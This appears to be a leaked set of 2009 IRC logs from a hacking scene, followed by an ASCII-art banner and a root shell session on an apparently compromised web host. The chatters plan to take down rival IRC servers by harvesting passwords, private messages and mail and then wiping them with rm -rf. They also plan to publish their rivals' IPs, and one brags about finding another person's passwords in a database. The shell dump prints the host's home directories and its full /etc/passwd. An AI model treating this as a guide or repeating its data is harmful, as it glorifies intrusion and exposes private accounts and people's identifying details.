17:40 (Dark) Haha
17:41 (Dark) She's majoring in CompSci yea?
17:41 (RoMeO) yes ;\
17:41 (Dark) Eh
17:41 (RoMeO) i hate CS
17:41 (Dark) Shoulda known
17:41 (Dark) Same
17:41 (RoMeO) too broad
17:41 (Dark) Fucking Linguistics + Econ for great justice
17:41 (RoMeO) java is gay
17:42 (Dark) To be honest, I haven't seen alot of the oldschool people for a really long time
17:42 (RoMeO) yeah
17:42 (Dark) Theres a few left here and there
17:42 (RoMeO) everyone gets busy for some time
17:42 (Dark) I wish they'd pop up
17:42 (RoMeO) but they all come back eventually
17:42 (Dark) I guess making a new antisec is where its gotta be
17:42 (RoMeO) i hope anyways
17:43 (Dark) I think defcon should go over well
17:43 (RoMeO) yes, new movement and just wait for people to join from diff communities
17:43 (Dark) After that
17:43 (Dark) As I see it
17:43 (Dark) Its all out war
17:43 (RoMeO) rawr
17:43 (Dark) So start saving your exploits nao
17:43 (RoMeO) hidden in sekret boxen ;O
17:44 (Dark) For sure
17:44 (RoMeO) lcirc is being monitored now
17:44 (RoMeO) they host  #milw0rm and #bottalk
17:44 (Dark) Probably
17:45 (RoMeO) no like. i know for sure
17:45 (Dark) Monitored by pr0jekt types, or by the feds?
17:45 (RoMeO) pr0ject types
17:45 (Dark) I figured as much
17:45 (RoMeO) and feds ofcourse, but pr0ject types got the root shell
17:46 (Dark) You know what the intentions are?
17:46 (RoMeO) take down after exposure
17:46 (RoMeO) intel, private messages, passwords, mail spools, then rm -rf
17:46 (Dark) can't say I've ever really been to lcirc
17:46 (RoMeO) should get them all to stop
17:47 (Dark) Owning milw0rm is a reasonable priority
17:47 (Dark) As well as Secfocus of course
17:47 (RoMeO) it is in the right hands
17:47 (RoMeO) :]
17:47 (Dark) I've been trying to go rogue on some stuff
17:47 (Dark) I'm not part of any group per se now that
17:48 (RoMeO) neither ami
17:48 (RoMeO) doing it on my own
17:48 (RoMeO) i function better solo
--- Log closed Thu Jun 18 18:07:45 2009

--- Log opened Fri Jun 19 09:07:17 2009
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] back
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] are you excited about leaving?
09:09 -pand!- Irssi: Starting query in secchat with BSDGurl
09:09 (RoMeO) well yea ;D
09:10 (BSDGurl) i was reading the logs this morning and like
09:11 (BSDGurl) i have to tell romeo good luck and to be safe etc before he leaves
09:11 (BSDGurl) i know you will have Internet but still
09:11 (RoMeO) :)
09:11 (RoMeO) thxthx
09:11 (BSDGurl) it's kind of scary
09:12 (BSDGurl) i was scared to start uni here
09:12 (RoMeO) thats why i moved bounces this week, i will be idle here 24/7 and read logs / messsages at night / whenver i can get online
09:12 (BSDGurl) hahahaha
09:12 (RoMeO) lawl, i am excitted
09:12 (BSDGurl) yes it was like a mix
09:13 (RoMeO) yea it is a mix of being scared and excitted, but all good
09:13 (BSDGurl) i hope you learn and are not bored
09:13 (BSDGurl) do you have maths and things?
09:13 (RoMeO) no thanks god
09:13 (BSDGurl) yes
09:14 (RoMeO) maths might be involved in a few chapters of the software engineeering, but all good
09:14 (RoMeO) not like computer science for example, which is all around maths and java -_-
09:14 (BSDGurl) hahahaa java
09:14 (RoMeO) yea...
09:14 (BSDGurl) you know i don't hate java
09:14 (BSDGurl) it's just all those guys
09:14 (RoMeO) i hate it cause of what i hear from those people
09:14 (BSDGurl) they ride the nuts
09:14 (BSDGurl) so hard
09:14 (RoMeO) lmao
09:14 (BSDGurl) it's like
09:14 (BSDGurl) funny
09:15 (BSDGurl) i can't help it
09:15 (RoMeO) this friend of mine in uni now
09:15 (RoMeO) his CS teacher walks in the room daily
09:15 (RoMeO) and screams
09:15 (RoMeO) JAVA IS THE FUTURE
09:15 (RoMeO) :|
09:15 (BSDGurl) rofl
09:15 (RoMeO) true story
09:15 (BSDGurl) they all do
09:15 (BSDGurl) hahahaha
09:15 (RoMeO) thats scary lol
09:15 (BSDGurl) i know
09:15 (RoMeO) how could java be possibly the future
09:16 (RoMeO) possibly be*
09:16 (BSDGurl) that's why i can't help but just say things to piss them off
09:16 (BSDGurl) i don't even care
09:16 (RoMeO) every lang got its use, kthxbai
09:16 (BSDGurl) i am like no
09:16 (BSDGurl) i don't even know java
09:16 (RoMeO) me too lmao
09:16 (BSDGurl) it maybe the future for all i know
09:16 (BSDGurl) hahaha
09:16 (RoMeO) future of wat xD
09:16 (BSDGurl) i just imagine them all pissed off
09:16 (RoMeO) lmao
09:16 (RoMeO) 'oh shit'
09:17 (BSDGurl) i went to rootsecurity the other night to see what was going on
09:18 (RoMeO) gay
09:18 (BSDGurl) cos this place is so dea
09:18 (BSDGurl) d
09:18 (BSDGurl) of course it was like
09:18 (BSDGurl) you are some pic
09:18 (BSDGurl) or this or that
09:18 (RoMeO) lol wow
09:18 (BSDGurl) i swear i can't go anywhere
09:18 (RoMeO) ;(
09:18 (RoMeO) - /nick BSDBoi
09:18 (BSDGurl) haha
09:18 (RoMeO) lolol
09:19 (BSDGurl) i don't understand i
09:19 (BSDGurl) t
09:19 (RoMeO) its internet
09:19 (BSDGurl) you know the big deal
09:19 (BSDGurl) oh and the guy
09:19 (BSDGurl) the one you banned that asked me if i was nell
09:19 (RoMeO) lol yea
09:19 (BSDGurl) he joined bhf and said
09:19 (BSDGurl) this chan is for fags
09:20 (BSDGurl) then left
09:20 (BSDGurl) rofl
09:20 (RoMeO) ;O
09:20 (RoMeO) he gots issues
09:20 (BSDGurl) so you know i am expecting people to say
09:20 (BSDGurl) bsdgurl this is you
09:20 (BSDGurl) and show me someone named nell now
09:20 (BSDGurl) hahaha
09:20 (RoMeO) xD
09:20 (RoMeO) 'i had you on myspace'
09:20 (RoMeO) wat
09:20 (RoMeO) .
09:21 (BSDGurl) i know
09:21 (BSDGurl) god  being on that site
09:21 (BSDGurl) i was years ago
09:21 (RoMeO) facebook is nice ;p 

// http://www.facebook.com/profile.php?id=1119054258 :)

09:21 (BSDGurl) like i haven't been for at least 2
09:21 (BSDGurl) no lie
09:21 (BSDGurl) i wouldn't lie i still have all the flash profiles i made etc
09:22 (RoMeO) haha
09:22 (BSDGurl) you know because you could custom it
09:22 (RoMeO) yeah
09:22 (RoMeO) not a myspace fan
09:22 (RoMeO) tho
09:22 (BSDGurl) me either now
09:22 (RoMeO) facebook is simple and good
09:22 (BSDGurl) i have an account
09:22 (BSDGurl) it's fake
09:23 (RoMeO) lol i hae a fake account with my public email there
09:23 (BSDGurl) last log in was december i think
09:23 (RoMeO) and i lol when people join dmz to tell me
09:23 (RoMeO) 'hello john genter'
09:23 (RoMeO) cause the name there is john genter
09:23 (RoMeO) lmfao
09:23 (BSDGurl) rofl
09:23 (BSDGurl) i hate that myspace shit though
09:23 (BSDGurl) seriously
09:24 (RoMeO) yeah
09:24 (BSDGurl) so yeah i am nell
09:24 (BSDGurl) haha
09:24 (RoMeO) hai nell
09:24 (RoMeO) xD
09:24 (RoMeO) http://www.nellmcandrew.tv/
09:24 (BSDGurl) i am curious to see if meathive stays
09:24 (RoMeO) i lol'd
09:25 (BSDGurl) last night he was really pissed at asta
09:25 (RoMeO) yea i saw
09:25 (BSDGurl) i told him you know the servers aren't related
09:25 (BSDGurl) but i don't think he believed me
09:25 (RoMeO) what servers 
09:26 (RoMeO) irc and web?
09:26 (BSDGurl) they irc
09:26 (BSDGurl) the
09:26 (RoMeO) yeah
09:26 (RoMeO) its ok lol
09:26 (BSDGurl) i didn't want to like go into with him
09:27 (BSDGurl) i was just like do what you think is best:/
09:27 (BSDGurl) i didn't know what to say
09:27 (RoMeO) haha, what is he doing anyways
09:27 (RoMeO) i just saw a rant
09:27 (BSDGurl) i know
09:27 (BSDGurl) i don't know what
09:28 (RoMeO) i think people should move on already
09:28 (BSDGurl) Me TOO
09:28 (RoMeO) lol!
09:28 (BSDGurl) thank you
09:28 (RoMeO) sites get hacked all the time
09:28 (BSDGurl) you know what i said
09:28 (BSDGurl) think about this
09:28 (BSDGurl) you know if you staged
09:28 (BSDGurl) that
09:29 (BSDGurl) and threw those ads
09:29 (BSDGurl) back up
09:29 (RoMeO) stunt
09:29 (BSDGurl) you would make bank 
09:29 (RoMeO) yes.
09:29 (BSDGurl) :)
09:29 (RoMeO) everyone checks asta now to see whats new in the 'hack'
09:29 (RoMeO) lolol
09:29 (BSDGurl) yes
09:29 (BSDGurl) think about that
09:29 (RoMeO) it got more backlinmks than google over night
09:29 (BSDGurl) membership down
09:30 (BSDGurl) etc
09:30 (BSDGurl) now look
09:30 (BSDGurl) cash in
09:30 (BSDGurl) think about it for darkmindz too
09:30 (BSDGurl) hahaha
09:30 (RoMeO) lmfao
09:30 (RoMeO) 'HACKED AND EXPOSED'
09:30 (BSDGurl) pwn xlink
09:31  -> BSDGurl dies
09:31 (RoMeO) and put all kinda ads on there, and blame the hacker
09:31 (BSDGurl) yes
09:31 (RoMeO) fun
09:31 (RoMeO) if i ever need money in uni, thats plan A
09:31 (BSDGurl) biber can be fall guy
09:31 (BSDGurl) hahaha
09:31 (RoMeO) ^^
09:32 (BSDGurl) let me go back to art shit
09:32 (RoMeO) oh enjoy
09:32 (BSDGurl) i just wanted to tell you have a safe trip
09:33 (RoMeO) thank you <3
09:33 (BSDGurl) if i didnt get to talk
09:33 (RoMeO) ^_^
09:33 (BSDGurl) <3 you are very welcome
--- Log closed Fri Jun 19 09:34:04 2009

--- Log opened Sun Jun 21 09:24:55 2009
09:24 [{Glyph_Home}(~glyph@mods.govsec.org)] btw, unless it's been you whacking GSO, the technique is becoming widespread.
09:25 -INFO- Irssi: Starting query in bhf with {Glyph_Home}
09:25 (RoMeO) mm?
09:28 (RoMeO) what are you talking about lol
09:29 ({Glyph_Home}) GSO has had issues this past week.
09:29 ({Glyph_Home}) I thought perhaps you were the reason.
09:29 (RoMeO) because  rsnake released a DoS tool
09:29 (RoMeO) nope
09:29 ({Glyph_Home}) No.. the litespeed issue
09:29 (RoMeO) my issues dont go on lagging web servers
09:30 ({Glyph_Home}) Though I have no idea why you'd nail GSO
09:30 ({Glyph_Home}) Doesn't seem to be your 'venue'
09:30 (RoMeO) that too
09:31 ({Glyph_Home}) I've already talked with Edu and WebDevil..
09:31 (RoMeO) about
09:31 ({Glyph_Home}) Gonna make my  'recommends' to the admins this week.
09:31 (RoMeO) i find it funny how staff at 'black hat forums'  get to be staff at ' gov sec' 
09:32 ({Glyph_Home}) Quesion: Any tips on 'mitigating' the /g0troot issue?
09:32  -> {Glyph_Home} chuckles
09:32 ({Glyph_Home}) Not exactly a 'whitehat' myself.
09:32 (RoMeO) lolol
09:32 ({Glyph_Home}) I just don't 'participate' in the darkside anymore.
09:33 (RoMeO) just keep the site clean, didnt see gso being mentioned anywhere as a target, ever
09:33 (RoMeO) so all good
09:33 ({Glyph_Home}) Used to..

09:33 (RoMeO) but people who are going down soon are botnet communities for example 
09:34 ({Glyph_Home}) hmmm... Sounds like a shadowserver operation.
09:34 (RoMeO) just cleaning the net
09:34 ({Glyph_Home}) Straight out of the 'toyshop'
09:34 (RoMeO) :]
09:35 ({Glyph_Home}) Antisec is beginning to sound more like 'cybercops' 
09:36 (RoMeO) haha

09:36 (RoMeO) wont be done under antisec 
09:36 (RoMeO) antisec is kept for 'security' issues 
09:36 (RoMeO) this is, botnet and skids crap

09:36 ({Glyph_Home}) hmmm... 
09:37 ({Glyph_Home}) IFF I can be of assistance, without endangering current position, I offer my not so hot skill sets.
09:37 (RoMeO) all good so far
09:37 (RoMeO) lcirc and indoirc got comprimised
09:37 (RoMeO) the 2 largest botnet and ccpower ircd's
09:38 ({Glyph_Home}) w00f
09:38 (RoMeO) ;)
09:38 ({Glyph_Home}) Might be an idea for the info to make it back to the ccproviders.. discretely and anonymously of course.
09:38 (RoMeO) well
09:38 (RoMeO) the idea is
09:39 (RoMeO) to release all intel and ip's on the people who started those channels / irc's
09:39 (RoMeO) out in the public and all over the net
09:39 (RoMeO) let the authorities deal with that
09:39 ({Glyph_Home}) roflmao
09:39 (RoMeO) :]
09:39 (RoMeO) brb
--- Log closed Sun Jun 21 09:44:31 2009


--- Log opened Mon Jun 22 16:15:04 2009
16:15 (Glyph) ?
16:15 (Glyph) Oh.. that stuff
16:15 (Glyph) Old stuff.. was playing more or less.
16:16 (Glyph) Course my 'playtime' tends to lead to profitability ;)
16:16 (Glyph) All that is at least five years old or older.
16:16 (Glyph) circa 2005
16:17 (RoMeO) yeah
16:17 (RoMeO) thinking of setting up a box for dark
16:17 (RoMeO) see what is he going to do
16:17 (RoMeO) ofcourse everything will be patched to log in's and out's // HOOKIN.. HOOKOUT.. 
16:18 (Glyph) Well you know the saying.. friends close, enemies closer ;)
16:18 (RoMeO) yeah
16:18 (RoMeO) sure do
16:18 (Glyph) Can't believe spike threw error's like that, and that's what he recommended?
16:18 (RoMeO) lol
16:19 (RoMeO) thats why i want to see what is he goign to do on a box
16:19 (RoMeO) anyone can talk
16:19 (RoMeO) specially on the internet
16:19 (Glyph) I'm beginning to think he 'talk's a good game'..
16:19 (Glyph) snap!
16:19 (RoMeO) :P
16:19 (RoMeO) thats what i heared from everyone so far
16:19 (RoMeO) i will even give him a none chrooted shell
16:19 (Glyph) Have you lost your mind?
16:19 (RoMeO) lol
16:19 (Glyph) Damn if I'd trust him that far.
16:20 (RoMeO) it will be an empty box
16:20 (Glyph) jailed, maybe.. unjailed never.
16:20 (RoMeO) and every shell is modified to log to a remote system
16:20 (Glyph) Now yer sounding like me.
16:20 (RoMeO) i will sit there wth a cop of tea and tail -f
16:21 (Glyph) tail -f firewall | grep 'insert key phrase of the day here' 
16:28 (RoMeO) reading stories about knuth
16:28 (RoMeO) how to own a continent for example
16:28 (RoMeO) that one is amazing
16:29 (Glyph) It's NOT hard.
16:29 (RoMeO) if you didnt read it, you should
16:38 (RoMeO) i was looking around dark for a while
16:38 (RoMeO) and what surprised me is
16:38 (RoMeO) his really low-quality passwords
16:38 (RoMeO) like
16:38 (RoMeO) 123123
16:38 (RoMeO) or 123pass
16:38 (RoMeO) etc
16:38 (RoMeO) made me go ?
16:39 (Glyph) almost as bad as qwerty12345
16:39 (RoMeO) yes
16:40 (RoMeO) just one more thing that shows he is talk-only
16:40 (RoMeO) okay he can argue that he doesnt 'reuse passwords'  but using really weak passwords -does- mean something
16:40 (Glyph) worse yet.. he could be a c&p
16:40 (RoMeO) that would be so bad
16:43 (Glyph) Yeah.. it would.
16:44 (Glyph) Actually, I sometimes think you and he are one in same and are playing 'mindfuck' with me.
16:44 (RoMeO) hahaa
16:44 (RoMeO) why would we tho
16:45 (Glyph) Because you were bored with the brainless fucks we normally encounter.
16:46 (RoMeO) when that happens i just log on a shell and explore ;p
16:46 (RoMeO) one more thing
16:46 (RoMeO) dark is a yahoo user
16:46 (RoMeO) that counts 
16:47 (RoMeO) thats -100 sec points
16:47 (RoMeO) i do tag people by there email s too
16:47 (RoMeO) for example
16:47 (RoMeO) yahoo users,  mostly newbies / females
16:48 (RoMeO) hotmail users, same thing but a higher level a small higher level
16:48 (RoMeO) gmail users are on top and above that comes the people with there own mail servers 
16:48 (RoMeO) its alot deeper than that, but thats just a quick explanation :P
16:50 (RoMeO) found 2 passwords of dark in my db
16:50 (RoMeO) and they both fail
16:50 (RoMeO) hellohello is one of them -_-'
--- Log closed Mon Jun 22 16:55:25 2009

--- Log opened Tue Jun 23 17:19:55 2009
17:19 (Glyph) ?
17:20 (RoMeO) 15:23:42 (Glyph) Apache/2.2.11 (FreeBSD)
17:20 (RoMeO) 15:24:33 (Glyph) Johnny_Demonik
17:20 (RoMeO) 15:27:48 (Glyph) ERROR: Database error.
17:20 (Glyph) Ahhh...
17:21 (Glyph) He came up out of 64.127.41.18
17:22 (RoMeO) ah
17:22 (Glyph) That ip is apparently a 'shell' anyhow there's port 9050 on it.
17:22 (Glyph) But it goes back to WestVirginia..
17:22 (RoMeO) yeah
17:23 (Glyph) Firm called Compucrash
17:23 (Glyph) Their webserver is at .3 of that range.
17:23 (RoMeO) alrit, lets just hope he comes back here, busy with another hack ;p
17:23 (Glyph) So silly me, I tried to access their ircd thru their webpage.
17:23 (RoMeO) lol
17:24 (Glyph) That's when the MySQL threw the error code at me.
17:24 (Glyph) Then I checked the forums.
17:24 (Glyph) You wouldn't believe it.. PHPBB3
17:24 (Glyph) Pr0nsters have already been at it.
17:24 (RoMeO) lmao
17:24 (RoMeO) yea
17:25 (RoMeO) i saw that one
17:25 (Glyph) Not heavily.. but that's prolly because it's 'under the radar'
17:25 (Glyph) Plus the bw is pricey as heck.
17:26 (Glyph) I'm heading home..
17:26 (Glyph) You have a good un.
17:26 (RoMeO) thanks
17:26 (RoMeO) enjoy
--- Log closed Tue Jun 23 17:31:25 2009

--- Log opened Wed Jun 24 17:11:08 2009
17:11 [Glyph(Glyph@mods.govsec.org)] http://74.125.47.132/search?q=cache:jdsSh2XXmQAJ:www.fcc.gov/mb/engineering/2008_PSIDs_form325.xls+%22MetroCast+Communications+of+Mississippi%22&cd=12&hl=en&ct=clnk&gl=us
--- Log closed Wed Jun 24 17:16:42 2009

--- Log opened Sat Jun 27 23:05:38 2009
23:09 8/[g
_______         _______      _____
\   _  \ ___  __\   _  \    /  |  |
/  /_\  \\  \/  /  /_\  \  /   |  |_
\  \_/   \>    <\  \_/   \/    ^   /
 \_____  /__/\_ \\_____  /\____   | 
       \/      \/      \/      |__| 
      .__  __         .__                                   .___                             
___  _|__|/  |______  |  |   ____________   ____   ____   __| _/______ 
\  \/ /  \   __\__  \ |  |  /  ___/\____ \_/ __ \_/ __ \ / __ |/  ___/ 
 \   /|  ||  |  / __ \|  |__\___ \ |  |_> >  ___/\  ___// /_/ |\___ \  
  \_/ |__||__| (____  /____/____  >|   __/ \___  >\___  >____ /____  > 
                    \/          \/ |__|        \/     \/     \/    \/  
          __________                _________              
          \______   \_______  ____ /   _____/ ____   ____  
  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
           |____|     |__|   \____/_______  /\___  >\___  >
                                          \/     \/     \/ 

root@light [/]# hostname
light.co1.org
root@light [/]# uname -a
Linux light.co1.org 2.6.17.5-HN-2.3-P4 #1 SMP Sat Jul 15 09:55:04 EDT 2006 i686 i686 i386 GNU/Linux
root@light [/]# date
Tue Jun 23 20:06:26 EDT 2009
root@light [/]# cd /home
root@light [/home]# ls
./            blndbill/       .cpcpan/        deevour/   group88/   joshd/     lost+found/     nglgorg/     r00t/      timc/
../           blueacre/       cpeasyapache/   denial/    hadrys/    karbassi/  mapmap/         nickg/       radical/   timc14/
amp3dne/      bziem/          cprestore/      digital/   handknit/  kcole/     maraka/         noct/        rannman/   tmp/
animal/       cache/          cpzendinstall/  drireign/  harry3/    kidc/      mrwoot/         nycrob/      raven/     tradefx/
apadana/      cawn/           craig/          edgein/    hasting/   knokes/    msupike/        olliee/      robotey/   untitled/
aquota.user*  cfurn/          ctcped/         fran459/   hastings/  kozmo/     munin/          pioneer/     russ43/    values/
army/         charice/        curator/        func88/    ircmilw/   kujio/     MySQL-install/  plumcree/    sheik/     vincent/
auxone/       chemmer/        daelenbe/       futonre/   jamesj/    kyle/      national/       porch46/     starr/     virtfs/
badassb/      christa/        danielc/        fxarbitr/  jb007/     lakeshor/  neptunes/       prime/       stopcand/  vitus/
bebe/         cmilone/        ddosmyi/        ganja/     jeffhem/   light/     netdevil/       psurge/      sub/       wrench/
berkel/       .cpan/          dear/           ganja51/   jer1h/     lithium/   netenberg/      qstud/       syscrash/  yasha/
billing/      cpapachebuild/  decalsby/       greg93/    jkaiser/   lost/      nglgnet/        quota.user*  tickah/
root@light [/home]# 

root@light [/home]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
amp3dne:x:32005:32006::/home/amp3dne:/usr/local/cpanel/bin/noshell
auxone:x:32006:32007::/home/auxone:/bin/false
badassb:x:32007:32008::/home/badassb:/usr/local/cpanel/bin/noshell
cache:x:32011:32012::/home/cache:/usr/local/cpanel/bin/noshell
cawn:x:32012:32013::/home/cawn:/bin/false
cfurn:x:32013:32014::/home/cfurn:/bin/false
cmilone:x:32016:32017::/home/cmilone:/usr/local/cpanel/bin/noshell
craig:x:32017:32018::/home/craig:/usr/local/cpanel/bin/noshell
dear:x:32021:32022::/home/dear:/bin/false
drireign:x:32024:32025::/home/drireign:/usr/local/cpanel/bin/noshell
fran459:x:32028:32029::/home/fran459:/usr/local/cpanel/bin/noshell
futonre:x:32030:32031::/home/futonre:/usr/local/cpanel/bin/noshell
greg93:x:32031:32032::/home/greg93:/usr/local/cpanel/bin/noshell
harry3:x:32034:32035::/home/harry3:/usr/local/cpanel/bin/noshell
jkaiser:x:32039:32040::/home/jkaiser:/usr/local/cpanel/bin/noshell
joshd:x:32040:32041::/home/joshd:/bin/false
kcole:x:32041:32042::/home/kcole:/usr/local/cpanel/bin/noshell
kidc:x:32042:32043::/home/kidc:/usr/local/cpanel/bin/noshell
kozmo:x:32043:32044::/home/kozmo:/usr/local/cpanel/bin/noshell
light:x:32047:32048::/home/light:/usr/local/cpanel/bin/noshell
lost:x:32049:32050::/home/lost:/usr/local/cpanel/bin/noshell
msupike:x:32057:32058::/home/msupike:/usr/local/cpanel/bin/noshell
neptunes:x:32058:32059::/home/neptunes:/bin/sh
nickg:x:32060:32061::/home/nickg:/usr/local/cpanel/bin/noshell
olliee:x:32061:32062::/home/olliee:/usr/local/cpanel/bin/noshell
pioneer:x:32063:32064::/home/pioneer:/usr/local/cpanel/bin/noshell
plumcree:x:32064:32065::/home/plumcree:/usr/local/cpanel/bin/noshell
porch46:x:32065:32066::/home/porch46:/usr/local/cpanel/bin/noshell
qstud:x:32066:32067::/home/qstud:/usr/local/cpanel/bin/noshell
rannman:x:32068:32069::/home/rannman:/usr/local/cpanel/bin/noshell
sheik:x:32079:32080::/home/sheik:/usr/local/cpanel/bin/noshell
starr:x:32081:32082::/home/starr:/usr/local/cpanel/bin/noshell
stopcand:x:32083:32084::/home/stopcand:/usr/local/cpanel/bin/noshell
timc14:x:32089:32090::/home/timc14:/usr/local/cpanel/bin/noshell
values:x:32090:32091::/home/values:/bin/sh
vitus:x:32091:32092::/home/vitus:/usr/local/cpanel/bin/noshell
yasha:x:32099:32100::/home/yasha:/usr/local/cpanel/bin/noshell
tickah:x:32103:32104::/home/tickah:/usr/local/cpanel/bin/noshell
charice:x:32106:32107::/home/charice:/bin/false
animal:x:32109:32110::/home/animal:/usr/local/cpanel/bin/noshell
ganja51:x:32110:32111::/home/ganja51:/bin/false
ganja:x:32111:32112::/home/ganja:/usr/local/cpanel/bin/noshell
mrwoot:x:32113:32114::/home/mrwoot:/usr/local/cpanel/bin/noshell
karbassi:x:32114:32115::/home/karbassi:/usr/local/cpanel/bin/noshell
nycrob:x:32115:32116::/home/nycrob:/bin/false
radical:x:32118:32119::/home/radical:/usr/local/cpanel/bin/noshell
jer1h:x:32119:32120::/home/jer1h:/bin/false
denial:x:32121:32122::/home/denial:/usr/local/cpanel/bin/noshell
jamesj:x:32123:32124::/home/jamesj:/usr/local/cpanel/bin/noshell
nglgnet:x:32124:32125::/home/nglgnet:/usr/local/cpanel/bin/noshell
nglgorg:x:32125:32126::/home/nglgorg:/usr/local/cpanel/bin/noshell
russ43:x:32126:32128::/home/russ43:/usr/local/cpanel/bin/noshell
berkel:x:32127:32129::/home/berkel:/usr/local/cpanel/bin/noshell
hastings:x:32128:32130::/home/hastings:/usr/local/cpanel/bin/noshell
knokes:x:32129:32131::/home/knokes:/usr/local/cpanel/bin/noshell
decalsby:x:32132:32134::/home/decalsby:/usr/local/cpanel/bin/noshell
lakeshor:x:32134:32136::/home/lakeshor:/usr/local/cpanel/bin/noshell
army:x:32136:32138::/home/army:/bin/false
curator:x:32138:32140::/home/curator:/bin/false
tradefx:x:32142:32144::/home/tradefx:/usr/local/cpanel/bin/noshell
national:x:32146:32148::/home/national:/usr/local/cpanel/bin/jailshell
robotey:x:32147:32149::/home/robotey:/bin/false
vincent:x:32148:32150::/home/vincent:/usr/local/cpanel/bin/noshell
psurge:x:32149:32151::/home/psurge:/usr/local/cpanel/bin/noshell
prime:x:32150:32152::/home/prime:/bin/false
digital:x:32151:32153::/home/digital:/usr/local/cpanel/bin/noshell
ddosmyi:x:32153:32155::/home/ddosmyi:/usr/local/cpanel/bin/noshell
blueacre:x:32155:32157::/home/blueacre:/usr/local/cpanel/bin/noshell
kujio:x:32157:32159::/home/kujio:/bin/false
untitled:x:32158:32160::/home/untitled:/usr/local/cpanel/bin/noshell
danielc:x:32159:32161::/home/danielc:/bin/false
billing:x:32163:32165::/home/billing:/usr/local/cpanel/bin/jailshell
syscrash:x:32164:32166::/home/syscrash:/usr/local/cpanel/bin/jailshell
hasting:x:32165:32167::/home/hasting:/usr/local/cpanel/bin/noshell
wrench:x:32166:32168::/home/wrench:/usr/local/cpanel/bin/noshell
apadana:x:32167:32169::/home/apadana:/usr/local/cpanel/bin/noshell
ircmilw:x:32169:32171::/home/ircmilw:/usr/local/cpanel/bin/noshell
blndbill:x:32170:32172::/home/blndbill:/usr/local/cpanel/bin/noshell
edgein:x:32171:32173::/home/edgein:/usr/local/cpanel/bin/noshell
hadrys:x:32172:32174::/home/hadrys:/usr/local/cpanel/bin/noshell
bebe:x:32173:32175::/home/bebe:/usr/local/cpanel/bin/noshell
mapmap:x:32176:32178::/home/mapmap:/usr/local/cpanel/bin/noshell
cpanel-horde:x:32003:32004::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell
cpanel-phpmyadmin:x:32008:32009::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell
cpanel-phppgadmin:x:32009:32010::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell
kyle:x:32177:32179::/home/kyle:/bin/false
ctcped:x:32178:32180::/home/ctcped:/usr/local/cpanel/bin/noshell
fxarbitr:x:32179:32181::/home/fxarbitr:/usr/local/cpanel/bin/noshell
func88:x:32180:32182::/home/func88:/bin/bash
cpanelhorde:x:32010:32011::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32014:32015::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32020:32021::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32023:32024::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
christa:x:32181:32183::/home/christa:/usr/local/cpanel/bin/noshell
bziem:x:32182:32184::/home/bziem:/usr/local/cpanel/bin/noshell
jb007:x:32183:32185::/home/jb007:/usr/local/cpanel/bin/jailshell
timc:x:32185:32187::/home/timc:/usr/local/cpanel/bin/noshell
munin:x:32186:32188::/home/munin:/bin/bash
noct:x:32187:32189::/home/noct:/usr/local/cpanel/bin/jailshell
jeffhem:x:32188:32190::/home/jeffhem:/usr/local/cpanel/bin/noshell
chemmer:x:32189:32191::/home/chemmer:/usr/local/cpanel/bin/noshell
daelenbe:x:32190:32192::/home/daelenbe:/usr/local/cpanel/bin/noshell
deevour:x:32191:32193::/home/deevour:/bin/bash
raven:x:32192:32194::/home/raven:/usr/local/cpanel/bin/noshell
lithium:x:32193:32195::/home/lithium:/usr/local/cpanel/bin/noshell
netdevil:x:510:510::/home/netdevil:/usr/local/cpanel/bin/noshell
sub:x:511:511::/home/sub:/usr/local/cpanel/bin/noshell
r00t:x:512:512::/home/r00t:/usr/local/cpanel/bin/noshell
